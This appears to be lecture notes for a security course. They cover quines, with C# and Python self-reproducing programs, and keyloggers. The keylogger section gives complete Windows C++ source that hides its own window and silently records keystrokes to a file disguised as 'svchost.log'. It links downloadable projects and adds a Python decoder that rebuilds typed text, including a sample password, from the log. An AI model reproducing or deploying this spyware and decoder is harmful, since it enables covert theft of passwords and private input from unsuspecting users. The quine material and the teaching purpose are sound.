= Malicious Software =

Although this includes a wide variety of software, and you should read chapter 10 in preparation for the exam, I'm going to concentrate on two types in this lecture: viruses and keyloggers.

== Viruses ==

A virus must be able to copy itself verbatim onto other systems. The question is how? Can code (ASCII or otherwise) make a copy of itself? See if you can devise a logical sequence of actions that will output the same sequence of actions.

A program whose output is its own source text is called a quine. In general, the method used to create a quine in any programming language is to have, within the program, two pieces: (a) code used to do the actual printing and (b) data that represents the textual form of the code (e.g., the string s in the first C# example below). The code functions by using the data to print the code (which makes sense, since the data represents the textual form of the code), but it also uses the data, processed in a simple way, to print the textual representation of the data itself. That "simple way" is a quoting step: the copy of the data has to be printed wrapped in quotes, with any characters that would break the string literal escaped (see http://en.wikipedia.org/wiki/Quine_%28computing%29). In the first example below the quoting step is done by string.Format, which drops a double quote (char 34) on each side of the copy of s.

Here is one written in C#, laid out for readability:

{{{#!java
using System;

class Q
{
    static void Main()
    {
        string s = "using System;class Q{2}static void Main(){2}string s ={1}{0}{1};Console.Write(string.Format(s, s, (char)34, (char)123, (char)125));{3}{3}";
        Console.Write(string.Format(s, s, (char)34, (char)123, (char)125));
    }
}
}}}

Laid out like this it compiles and runs, but what it prints is the single-line program below, not the indented one, so it is not yet its own output. The placeholders in the template s are: {0} is s itself, {1} is the double quote (char 34) that wraps the copy of s, and {2} and {3} are the braces (chars 123 and 125), which cannot appear literally in a string.Format template without being doubled. To make it work perfectly you need to reformat it as follows, and note that there is no space between the = and the opening quote, because the template says string s ={1}:

{{{#!java
using System;class Q{static void Main(){string s ="using System;class Q{2}static void Main(){2}string s ={1}{0}{1};Console.Write(string.Format(s, s, (char)34, (char)123, (char)125));{3}{3}";Console.Write(string.Format(s, s, (char)34, (char)123, (char)125));}}
}}}

Does that look a bit esoteric?
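Before the longer C# version, here is the same two-part construction in Python, added here as an illustration and not part of the original lecture. The data is a template of the program text with a hole in it; %r is the quoting step (it prints the string wrapped in quotes with newlines and quotes escaped), and the code fills the hole with the template itself. The harness runs the resulting program and checks that its output is the program, byte for byte. The function names (quine_program, run_program, is_fixed_point) are this example's own.

```python
"""Added example: the code/data quine construction in Python, with a fixed-point check."""
import contextlib
import io

# Part (b), the data: the program text with a %r hole where its own quoted copy goes.
# %% is a literal percent sign, so the finished program still contains "s % s".
QUINE_SOURCE = 's = %r\nprint(s %% s, end="")\n'


def quine_program() -> str:
    """Part (a), the code: fill the template's hole with the quoted template."""
    return QUINE_SOURCE % QUINE_SOURCE


def run_program(source: str) -> str:
    """Execute Python source in a fresh namespace and return everything it printed."""
    captured = io.StringIO()
    with contextlib.redirect_stdout(captured):
        exec(compile(source, "<quine>", "exec"), {})
    return captured.getvalue()


def is_fixed_point(source: str) -> bool:
    """True when running the program reproduces its source exactly."""
    return run_program(source) == source


if __name__ == "__main__":
    program = quine_program()
    print(program, end="")
    print("reproduces itself:", is_fixed_point(program))
```

The generated program is two lines: an assignment of the template to s, then print(s % s, end=""). Running it performs the same substitution the generator did, which is why the output and the source coincide; any program that does not carry its own text as data, such as a plain print("hello"), fails the check.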
Look at a longer one, but one that is easier to follow. Here the array S is the data: the textual form of the body of Main, one line per element. The first foreach is the quoting step (it re-escapes backslashes and double quotes in each line and prints it as a string literal, reproducing the array initializer) and the second foreach prints the code itself:

{{{#!java
using System;
class P {
    static void Main() {
        string[] S = {
"        Console.WriteLine(\"using System;\");",
"        Console.WriteLine(\"class P {\");",
"        Console.WriteLine(\"    static void Main() {\");",
"",
"        Console.WriteLine(\"        string[] S = {\");",
"        foreach (string line in S) {",
"            string escapedLine = line.Replace(@\"\\\", @\"\\\\\")",
"                                     .Replace(\"\\\"\", \"\\\\\\\"\");",
"            Console.WriteLine(\"\\\"{0}\\\",\", escapedLine);",
"        }",
"        Console.WriteLine(\"        };\");",
"",
"        foreach (string line in S) Console.WriteLine(line);",
"",
"        Console.WriteLine(\"    }\");",
"        Console.WriteLine(\"}\");",
        };
        Console.WriteLine("using System;");
        Console.WriteLine("class P {");
        Console.WriteLine("    static void Main() {");

        Console.WriteLine("        string[] S = {");
        foreach (string line in S) {
            string escapedLine = line.Replace(@"\", @"\\")
                                     .Replace("\"", "\\\"");
            Console.WriteLine("\"{0}\",", escapedLine);
        }
        Console.WriteLine("        };");

        foreach (string line in S) Console.WriteLine(line);

        Console.WriteLine("    }");
        Console.WriteLine("}");
    }
}
}}}

The elements of S sit at column 0 in the source because the quoting loop prints them at column 0; the two must agree, like every other byte, or the output is not the source.

== Keyloggers ==

The following source code will get you started. To just download the examples use the links at the end of this section.
{{{#!cplusplus
/* Includes and the prototype for get_keys() are given here so the file compiles on its own. */
#include <windows.h>
#include <tchar.h>
#include <stdio.h>
#include <stdlib.h>

int get_keys(void);

int _tmain(int argc, _TCHAR* argv[])
{
    HWND stealth;

    /* creating stealth (window is not visible) */
    AllocConsole();
    stealth = FindWindowA("ConsoleWindowClass", NULL);  /* GetConsoleWindow() returns the same handle */
    ShowWindow(stealth, 0);                              /* 0 is SW_HIDE */

    int t = get_keys();
    return t;
}

/* Poll every virtual-key code in turn and append each new key press to svchost.log. */
int get_keys(void)
{
    short character;

    while (1)
    {
        for (character = 8; character <= 222; character++)
        {
            /* GetAsyncKeyState returns 0x8001 (-32767 as a short) when the key is down now
               and has been pressed since the previous call: exactly one new press. */
            if (GetAsyncKeyState(character) == -32767)
            {
                FILE *file = fopen("svchost.log", "a+");
                if (file == NULL)
                {
                    return 1;
                }

                if ((character >= '0') && (character <= '9'))
                {
                    /* Virtual-key codes 0x30..0x39 are the ASCII digits. Do not widen this
                       range downwards: 0x27..0x2F are VK_RIGHT..VK_HELP (VK_DELETE among
                       them), and they would be written as stray punctuation. */
                    fputc(character, file);
                    fclose(file);
                    break;
                }
                else if ((character > 64) && (character < 91))
                {
                    /* 0x41..0x5A are the letters A..Z; +32 gives the lower-case ASCII letter. */
                    character += 32;
                    fputc(character, file);
                    fclose(file);
                    break;
                }
                else
                {
                    switch (character)
                    {
                    case VK_SPACE:   fputc(' ', file);             break;
                    case VK_SHIFT:   fputs("[SHIFT]", file);       break;
                    case VK_RETURN:  fputs("\n[ENTER]", file);     break;
                    case VK_BACK:    fputs("[BACKSPACE]", file);   break;
                    case VK_TAB:     fputs("[TAB]", file);         break;
                    case VK_CONTROL: fputs("[CTRL]", file);        break;
                    case VK_DELETE:  fputs("[DEL]", file);         break;
                    case VK_OEM_1:   fputs("[;:]", file);          break;
                    case VK_OEM_2:   fputs("[/?]", file);          break;
                    case VK_OEM_3:   fputs("[`~]", file);          break;
                    case VK_OEM_4:   fputs("[ [{ ]", file);        break;
                    case VK_OEM_5:   fputs("[\\|]", file);         break;
                    case VK_OEM_6:   fputs("[ ]} ]", file);        break;
                    case VK_OEM_7:   fputs("['\"]", file);         break;
                    case VK_NUMPAD0: fputc('0', file);             break;
                    case VK_NUMPAD1: fputc('1', file);             break;
                    case VK_NUMPAD2: fputc('2', file);             break;
                    case VK_NUMPAD3: fputc('3', file);             break;
                    case VK_NUMPAD4: fputc('4', file);             break;
                    case VK_NUMPAD5: fputc('5', file);             break;
                    case VK_NUMPAD6: fputc('6', file);             break;
                    case VK_NUMPAD7: fputc('7', file);             break;
                    case VK_NUMPAD8: fputc('8', file);             break;
                    case VK_NUMPAD9: fputc('9', file);             break;
                    case VK_CAPITAL: fputs("[CAPS LOCK]", file);   break;
                    default:         /* every other key is ignored */ break;
                    }
                    fclose(file);
                }
            }
        }
        Sleep(10);  /* a short pause keeps the polling loop from pinning a CPU core */
    }
    return EXIT_SUCCESS;
}
}}}

Two things to notice when you read a log this produces. Letters are always written in lower case, and SHIFT and CAPS LOCK appear as separate tokens, so the case of what was typed has to be reconstructed from the token sequence. And because the program polls rather than hooks the keyboard (no SetWindowsHookEx), a key pressed and released between two passes of the scan loop is still caught, since GetAsyncKeyState remembers "pressed since last call" until it is next asked.

The source files are here:
 * [[attachment:KeyLogger.cpp]]
 * [[attachment:KeyLogger.h]]

= Zipped Projects =

You can get the Visual Studio 2010 projects in zipped format here:
 * Quine: [[attachment:Quine.zip]] (C# project)
 * Keylogger: [[attachment:KeyLogger.zip]] (C++ project)
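Going back to the keylogger: its svchost.log mixes raw characters with the bracketed tokens from the switch statement, and letters are always lower case, so reading it means replaying SHIFT, CAPS LOCK and BACKSPACE over the stream. The decoder below is an added example and is not part of the lecture or the KeyLogger project. It assumes a US keyboard layout, the token strings exactly as the C++ source writes them, and that a [SHIFT] token precedes the key it modifies (VK_SHIFT is 0x10, so the scan loop polls it before any letter or digit code). The sample log is constructed for the example; decode, tokenize and the constant names are this example's own.

```python
"""Added example: decode the svchost.log written by the keylogger back into typed text."""
import re
from typing import List

# Every multi-character token the logger writes. "\n[ENTER]" is listed first so the
# newline written before the token is consumed together with it.
TOKENS = [
    "\n[ENTER]", "[SHIFT]", "[BACKSPACE]", "[TAB]", "[CTRL]", "[DEL]", "[CAPS LOCK]",
    "[;:]", "[/?]", "[`~]", "[ [{ ]", "[\\|]", "[ ]} ]", "['\"]",
]
# Punctuation tokens show the unshifted and the shifted glyph, in that order.
PUNCT = {"[;:]": ";:", "[/?]": "/?", "[`~]": "`~", "[ [{ ]": "[{",
         "[\\|]": "\\|", "[ ]} ]": "]}", "['\"]": "'\""}
SHIFTED_DIGITS = dict(zip("1234567890", "!@#$%^&*()"))   # US layout assumption

# Longest tokens first, then any single character (DOTALL so a bare newline is a token too).
_TOKEN_RE = re.compile("|".join(re.escape(t) for t in TOKENS) + "|.", re.DOTALL)

# Constructed sample: the victim typed "Hello: World!", Enter, "pa", Backspace, "ssw0rd".
SAMPLE_LOG = "[SHIFT]hello[SHIFT][;:] [SHIFT]world[SHIFT]1\n[ENTER]pa[BACKSPACE]ssw0rd"


def tokenize(log: str) -> List[str]:
    """Split a log into one entry per key event."""
    return _TOKEN_RE.findall(log)


def decode(log: str) -> str:
    """Reconstruct the typed text: apply SHIFT to the next key, toggle CAPS LOCK,
    and let BACKSPACE erase the previously reconstructed character."""
    out: List[str] = []
    shift = False   # [SHIFT] applies to the next key only
    caps = False    # [CAPS LOCK] toggles
    for tok in tokenize(log):
        if tok == "[SHIFT]":
            shift = True
            continue
        if tok == "[CAPS LOCK]":
            caps = not caps
            continue
        if tok == "\n[ENTER]":
            out.append("\n")
        elif tok == "[TAB]":
            out.append("\t")
        elif tok == "[BACKSPACE]":
            if out:
                out.pop()
        elif tok in ("[CTRL]", "[DEL]"):
            pass                                   # no printable effect to reconstruct
        elif tok in PUNCT:
            out.append(PUNCT[tok][1 if shift else 0])
        elif tok.isdigit():
            out.append(SHIFTED_DIGITS[tok] if shift else tok)
        elif tok.isalpha():
            out.append(tok.upper() if shift != caps else tok)
        else:
            out.append(tok)                        # space and any other raw character
        shift = False
    return "".join(out)


if __name__ == "__main__":
    print(decode(SAMPLE_LOG))
```

Keys the logger ignores (comma, full stop, function keys, cursor movement) leave no trace, so what comes back is a best-effort transcript rather than an exact record; that is also the reason the ordering assumption about [SHIFT] matters, since a token that arrives after the key it modified would be applied to the wrong character.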